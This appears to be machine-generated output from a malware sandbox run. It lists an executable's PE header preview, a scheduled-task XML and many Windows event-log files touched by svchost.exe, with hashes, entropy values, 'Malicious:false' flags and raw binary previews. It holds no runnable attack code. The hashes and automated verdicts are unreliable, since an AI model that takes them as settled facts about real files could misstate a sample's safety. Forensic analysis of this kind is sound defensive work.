                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......%\...`... ..............................................p[.4.....[.x.... [.p.............[.0.............................[.(....................r[.P............................text...............................`..`.data....,Y.......Y.................@....rdata..0:....Z..<....Z.............@..@.pdata..p.... [.......[.............@..@.xdata.......@[.......[.............@..@.bss.........P[..........................idata..4....p[......&[.............@....CRT....`.....[......2[.............@....tls..........[......4[.............@....rsrc...x.....[......6[.............@....reloc..0.....[......>[.............@..B........................................................................................................................................................................
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):4680
                                              Entropy (8bit):3.711527043493107
                                              Encrypted:false
                                              SSDEEP:96:pYMguQII4i6J6h4aGdinipV9ll7UY5HAmzQ+:9A4q/xne7HO+
                                              MD5:9449653FF4DC2FD239D572D19AC4AD97
                                              SHA1:7BDC3F7C3F7B5AEA76B79C70747590894597097F
                                              SHA-256:E8346447B05D01B5E4C8037FB482D62FB817EB2C72467A9A6D58D18DF321289D
                                              SHA-512:6165FD70265B74A86414F6379C341F1129D5E14B85B32A3709CC7842230B205B453DA9523D0FDD7D29E36B6459B2CC6858787F0EECDB5C7585E76EDEA42DC6E7
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):3664
                                              Entropy (8bit):3.5415613224317393
                                              Encrypted:false
                                              SSDEEP:48:MgGyBLrP+FRGRNElW8F0OO6I4V37yLoLgm58GiNvZaCM5wYZ4Vr0Uw:rFBYYOF0OLHAoLBMNMCMjeVr0j
                                              MD5:AAF8F881BD8FCC0D978AAA127E1A4F6E
                                              SHA1:A54B490C84985CABA3750318A3F35A4B87F13840
                                              SHA-256:24FF7AD6BEBCE06314003111F8E553B46F93B72EE96AFB2ED18E7418A13B139D
                                              SHA-512:BE9DDA6B202FB3647DCFFD80836BE0EC2F6545FC2DC7F2126DB70A9D295A16AE49AA7EE5FFB019F5A15772927D4CD8AA3CC02045E38A63E74162ADE88E6832CB
                                              Malicious:false
                                              Preview:ElfChnk......................................................................................................................4............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...........&...........................................................................................................**................P............_.:&........_.:%&M_'\K.............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7....=.......K...N.a.m.e.......S.e.c.u.r.i.t.y.C.e.n.t.e.r..A..M...{........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 311, DIRTY
                                              Category:dropped
                                              Size (bytes):113360
                                              Entropy (8bit):3.775167257909115
                                              Encrypted:false
                                              SSDEEP:768:dJVUHiapX7xadptrDT9W84RpVUHiapX7xadptrDT9W84R:doHi6xadptrX9WPCHi6xadptrX9WP
                                              MD5:1873AC12882F3B05B99543DB5490D19E
                                              SHA1:FFC23A7DFA6ECEC3230C706FE88CC7CBECB0EE8A
                                              SHA-256:75305842F184656A8F40016DE2F617D9AFF74AAA53B09FFBFA8F4D58D0C3E495
                                              SHA-512:343FFFEE7A2EBA3BC2D558B068719E83A925EB7092F7D54027F1EFA3A112519087F739EFCF1A115C21147F2D72F83E5D9CBB9BF8CA2F7B54C24C2A7A7DFDABCF
                                              Malicious:false
                                              Preview:ElfFile.................7.....................................................................................................[.ElfChnk.........8...............8...............P....Cp........................................................................5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r......&............m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.410855322954594
                                              Encrypted:false
                                              SSDEEP:384:XhaNFiEgN4NONMNKO6NZNC4NCuNBNkNOjCNRnNhNjNAINTNxXN3N/RNaON/BNUNY:XMiEfrvhF1T8jHj+qiQXYxd
                                              MD5:CB311EA91302B5598078958985827FCC
                                              SHA1:75C3F6845AC46F41153D137776B60A026F2ABDA7
                                              SHA-256:E3DDEEF5EC30C436328106077C673C5A27D9FAD11A3B01C9216B72075464E89B
                                              SHA-512:36537B9EA43C41155232131FBC9D3FFF86F8E290BEB66D7B6CDDC64EC860D303E01D60BC2B8F49DADFE17F1BB8164AD8907833A5B1AA265D660929803061D9C2
                                              Malicious:false
                                              Preview:ElfChnk.......................................... ..I........................................................................{.~................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................m...&...]...................................................................**..............!.U.|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):68832
                                              Entropy (8bit):4.278122780832949
                                              Encrypted:false
                                              SSDEEP:384:XVhVeVUV1VXVmhcV8CVhfVhxajVhjV4bV4ZwVIoVJVXVdVzVfV99VUVaV9VmVzV7:8N1ni20Hl6Mun
                                              MD5:25FF42E4FE9EFAF614AE7FF81247648A
                                              SHA1:55E8BC850DE486E4C995C89AFCCC04D9AC3649DB
                                              SHA-256:88A9889133C7FB6BFB85C1EA5516E8DB73FABE7F78667830D27B4F3AC80A576C
                                              SHA-512:23A10DA91154847AE3C44355C3BD3208022F5E53C2D148B131A4EF2A0A989A157F452C6BCAEC27ADAE5585894A322D075BB10B8BFA774425ACB8925406AF360E
                                              Malicious:false
                                              Preview:ElfChnk..................................... 8...9.............................................................................S................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&...............................A ......................................**.................`|...........>.&...............................................................@.......X..._.!.....E..........@...`|....#..|...@@..|.......<........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e..... .M.i....**..............x-.`|...........
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):67008
                                              Entropy (8bit):4.296716059859231
                                              Encrypted:false
                                              SSDEEP:384:hm7mk/hgmAmAam5vDmdkkmpTiMmNmMmMm2AAm7xmzmcma7mcgmxmlmZkmJmamZmW:W/BkLTiVAsPGBptZitviw26e
                                              MD5:A6E33032340349288404781371E89451
                                              SHA1:D086259FB7E6DC9AA3AA675EF4B138A7374EC151
                                              SHA-256:7EC8DE6D814EDD5FA50303123BF101E7FAF25EDCB3514FF51517746B3BCD1168
                                              SHA-512:56B54648982969F42874596287E3460AD7C68478C101F12A32AB6297D7E2F41D8FB749477E4E71A35EF8E36F0E08845B047ADF71F4B314819755C84D4882FDB9
                                              Malicious:false
                                              Preview:ElfChnk..2.......2.......2.......2.................X.........................................................................k.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................c....&...,...........................7......&...........S.......S......3...[#..s1.......................v..........**.......2........6.............>.&...............................................................N.......d..._.!.....[..........@..6......#..|...Z`..|...l........2...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c.......a.g....**......
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
                                              Category:dropped
                                              Size (bytes):70680
                                              Entropy (8bit):0.7955062001888485
                                              Encrypted:false
                                              SSDEEP:384:PihpiMLO1iCDil8BiOhpiMLO1iCDil8Bi:a8/8
                                              MD5:A29D00947E468D34C281D6CC9C455B5E
                                              SHA1:B45FE94E3ED362455A30F76080DE68AC06EFBE46
                                              SHA-256:B7C8C1154F4D865E5335CA211357499D6C2DA2A4657AE0B5CA088F1FABECF5F4
                                              SHA-512:9C430BB5EF48984DE4CDE741E3C835BE79E9F07C2BC38EDB2F8F9FA884BC7A2A23D6B206ED8AEEDC5BEACCECC9B1D41E45629F273B64A4CB8E91A5A0005DC719
                                              Malicious:false
                                              Preview:ElfFile.........................................................................................................................ElfChnk.....................................@.........!m......................................................................~.............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................................................................................f...................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.135506377760409
                                              Encrypted:false
                                              SSDEEP:1536:ObBN2A4VD7VAx8whAGU2woJQghMKCnQNFKdI:
                                              MD5:BEB02D0DB227CCADB0BF2C35CD070FD8
                                              SHA1:093F95EF5F38C568B287E2E432C979DEE5F5F90E
                                              SHA-256:AB4AF4CEC5CAB588824E77B07941DFC2EBF91205ABA38A6333B068BC7A8285A6
                                              SHA-512:F47011A3E49890DFCED09FEAA1FB94D67BF27799EEE89B8F2ACE03D2242656BFD3D4042E0B7C0881F2AD0E7787752E5070858C0ED639C4E1FBF04D1405C02B8C
                                              Malicious:false
                                              Preview:ElfChnk.........Z...............Z...........p.................................................................................g.............................................=...................................................................................%.......................................X...............?...............................................M...F...............................................................................................................F...................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.364691867738079
                                              Encrypted:false
                                              SSDEEP:1536:IXY5nVYIyyqED5BVZUeR+oIaK+X7l/zW:IXY5nVYIyyqED5BVZUeR+oIaK+X7la
                                              MD5:C5FB19AD605F452A0958D4E93527B32C
                                              SHA1:852DD910D6716F03322D3567DC1E0CD2331ED725
                                              SHA-256:DC7725A06A661AB4CFDDCA37C9F7C7B60C4B62E584DA9214CD06B3C37712FEB8
                                              SHA-512:C72310520F98D2B97AF7B0A9E7963DE54753E515E0B8A5B4AC27B3163049BE476E5C5FFD2B2A86CAE9475C4D6EB1AAF962AEDFE884A38C64FF3E350A127EB3CF
                                              Malicious:false
                                              Preview:ElfChnk.........v...............v.....................h.....................................................................{.i.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):93416
                                              Entropy (8bit):2.1231712406067604
                                              Encrypted:false
                                              SSDEEP:384:EoSKmoEhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorfUoUor3orK:6DCxTDCxmp
                                              MD5:B3E3351A54BE63A4C85309B682C50E19
                                              SHA1:1A87D32997AEB500CEAE80A1CC079BEB52BE7963
                                              SHA-256:672953B196466B47A8EC2ED42FD783E16C614661E3294E7121BCC3ED8AE2E37B
                                              SHA-512:8E316D74917B9CF2CA5CBC54748195E1C4180BB21ECA96DFD5EDEDB52D73D3DEEFE01094904FFAF590388F7533153581AC705F5CD5F10BB92CB90F412CA8EE72
                                              Malicious:false
                                              Preview:ElfChnk.....................................(*..X,...X....................................................................<&E.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................................................'..............................**................#.............>................................................................>.......V...X.!..e................#......#..|...WL..|................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>..'......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.8225230073670663
                                              Encrypted:false
                                              SSDEEP:384:/hAiPA5PNPxPEPHPhPEPmPSPRP3PoP2PTnPrPdP:/2Nj
                                              MD5:E193E0DE6C160F3067F34D28562C3D37
                                              SHA1:B4896FA40B0CC4B1DF7D86AFBBD364198FCF58CE
                                              SHA-256:2C991430EE268B36EBF8162333381765DDA10AFE5858CCA4439BE6468F8A9885
                                              SHA-512:79DC790625D7BD09C34F221DEF5B9AFA59059D743EF468BAC5C9BFB5B061A790CD94F485E8547500D006FF017D0B965CCAF8491E8D4F2A964CD9502A26BFB92D
                                              Malicious:false
                                              Preview:ElfChnk......................................#...%....8........................................................................F................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.8145005766277224
                                              Encrypted:false
                                              SSDEEP:384:jhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lA:jWXSYieD+tvgzmMvpmypR
                                              MD5:D55B088C0E91BF826E4C83D7214730FC
                                              SHA1:1E955E6F1F21AABCEC6159B38DBE8C6F59FD8087
                                              SHA-256:11BA96DD7462113CFAF207726331AE5432B83FECBB1D7FF41FC363736672E3AD
                                              SHA-512:C0C824271A723A331AEEBB42D3E3818C15E518A5B0A3EE293CC63EB60EF078E66EB8775CF6F14C389784F6AC8A52A1AAA51E505014E0A2C58E879CC2E7B31F3E
                                              Malicious:false
                                              Preview:ElfChnk......................................#...$..k../....................................................................3._.................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................&.......................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):66536
                                              Entropy (8bit):3.005244253258629
                                              Encrypted:false
                                              SSDEEP:384:IahrhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqo:IobCyhLfIcP4
                                              MD5:BB7F115DF4D85372F7C0A8D97A68C4D8
                                              SHA1:D4EEAD53623CE270277F80BC1A4D2110D343438C
                                              SHA-256:DB573A5F7F350BB2E38ACD5ADE18F04B5F437064FF22DE75C25FFB65BDA53E93
                                              SHA-512:283B780E34B6B2ABBD1236A93ADFC8976F8EAC3AB530935726782078DB671452A05A397F69795E975780712618AB70250416E7322D1C666ECC5B06165F9BC664
                                              Malicious:false
                                              Preview:ElfChnk.........H...............H.....................9.......................................................................6.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...............~v......................................................................**......H.........V.............>.~v..............................................................<.......T.....!...................V......#..|....#..|...........H....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`.......[.?D.Z..w.7.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.2415208663929267
                                              Encrypted:false
                                              SSDEEP:768:VcMhFBuyKskZljdoKXjtT/r18rQXn8415jCJ:2MhFBuV
                                              MD5:CE953E1E24F72AD450D67BA225E8CA24
                                              SHA1:4B21B9B1229521A48260D956D9EF82466924F0B3
                                              SHA-256:86C4679EACDE99AE31A1EFC0B91EE5237FED2CC4F09B39EB5CA32C15E30839F1
                                              SHA-512:370467BEDAE061F1B6578EF86BD9B5FDEAD08335A2D3C5B49BCEEA2F9F678A5BBE6FDA2E03AC2958CBE3F8B2C3173891E4BA2DCA76D046C888EFF8709CAE9FDF
                                              Malicious:false
                                              Preview:ElfChnk.........J...............J...........@...............................................................................p.#................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.597007668718324
                                              Encrypted:false
                                              SSDEEP:768:8VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaCcOqjBz:bH
                                              MD5:D98BB9898E97B0AA8097C3C2AA528366
                                              SHA1:57B213260AA8BBABB63274AE40F474E86258AFF9
                                              SHA-256:563B8952C1D1C67669B0FDEE2D94FD15506AF61BAFE59D5725E51B81E8771030
                                              SHA-512:FA577C2EF43A7D85BBAD550CF0776D6229D9C1CBCD5A7C4BE4C0D9172ECE66DE9F04B7C0E68EB9C934C75761212C8F8A075FECD67BDC9BE08D91992144AC706C
                                              Malicious:false
                                              Preview:ElfChnk.........l...............l.............................................................................................._................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 22, DIRTY
                                              Category:dropped
                                              Size (bytes):88920
                                              Entropy (8bit):2.491814273419717
                                              Encrypted:false
                                              SSDEEP:384:Vbh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzw:xMAP1Qa5AgfQQqqMAP1Qa5AgfQQq
                                              MD5:979F4A7F39B25BD68E7225E01AC42D83
                                              SHA1:6393E2F60D189419609799EF2C4A5AFAEECD0A61
                                              SHA-256:849B2CC289A6609FF9324909A35E364F74E902BE560B1D3E574E06B51E6D2553
                                              SHA-512:F7CE70A0D334C73C9A1D7DB0A002E86BAA30FF8CEC9FEF916BF10E97F9BE179EC64D9F5D0081FB81F244FAFA6E51EE9136BDA4716F58EE8932C9074B0EAC9110
                                              Malicious:false
                                              Preview:ElfFile.....................................................................................................................a .iElfChnk......................................U...Z...)."....................................................................y/..................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................U.......................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.435337137002791
                                              Encrypted:false
                                              SSDEEP:384:uhbExEaE9EzE0E9EAmESE5E7EGELmEgcxEME7E3ESEmBEODUEtEUEQE7EZeIVjEp:uXHucFe09qNiHhIejgVk
                                              MD5:75F78963C0B36672422FBB7BFEDA205C
                                              SHA1:7FEF5FF9526359845B4B7CED9BB25FC2DAA48444
                                              SHA-256:3D99234D1704D61715BA47558DC2BB8A72399BCA72861BBF9BBBAD566EA53E3D
                                              SHA-512:63080D340B33DF8418977430F4E2F1DF647F10A50D4564F7466CD24C2355C363DF8D6540DBAAC0E42273868924EE411EC51068A6F7639B4483C09A640593006A
                                              Malicious:false
                                              Preview:ElfChnk.........n...............n........... .......:=.Y....................................................................O...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F........................................8.......................<...........@..m>.......:..%D..........u+.......&..........m$..........=...]2......**...............i..z.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.242406347919902
                                              Encrypted:false
                                              SSDEEP:384:5hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl7:51T4hIQ0
                                              MD5:24A05FB4CA6A530DC4D40404368A043A
                                              SHA1:6679C234B0E3080E39D1367D95BB6F539259A052
                                              SHA-256:A305C8003D5A4C4B3AE309ECA013E5592FF352D22842FECA37E70AFD0AAA4043
                                              SHA-512:EB4BDECFFD43F5830E883A49AFCC90AB5EC2E81159CEDA7C41AE421F8E7E4EEC1FC7EBDE6B884F175BF709B2E281AB272C4E1F6A51A4CB08CE6341F2B6BFE42A
                                              Malicious:false
                                              Preview:ElfChnk.........i...............i........... ................................................................................x@................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.351739790289868
                                              Encrypted:false
                                              SSDEEP:384:NahFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDx:MzSKEqsMuy6f
                                              MD5:8EE5F0242DD4C47EFF5682FCF04DFA22
                                              SHA1:2533997723757D8F3C8D7838C8B3576FA9DBB925
                                              SHA-256:1926D474DBD075F9D12EECF13B90A95F5CA0F230810DD2B41A68236556A8F256
                                              SHA-512:ECAC7764E2441600BC58CF3C5DFA7D7BBF726885544DD7CF281C835D08E1E580FE12F2CD96A569C55E9E1C6ACFE7266739503E07CF51CB2FDD85DD851C6CADAB
                                              Malicious:false
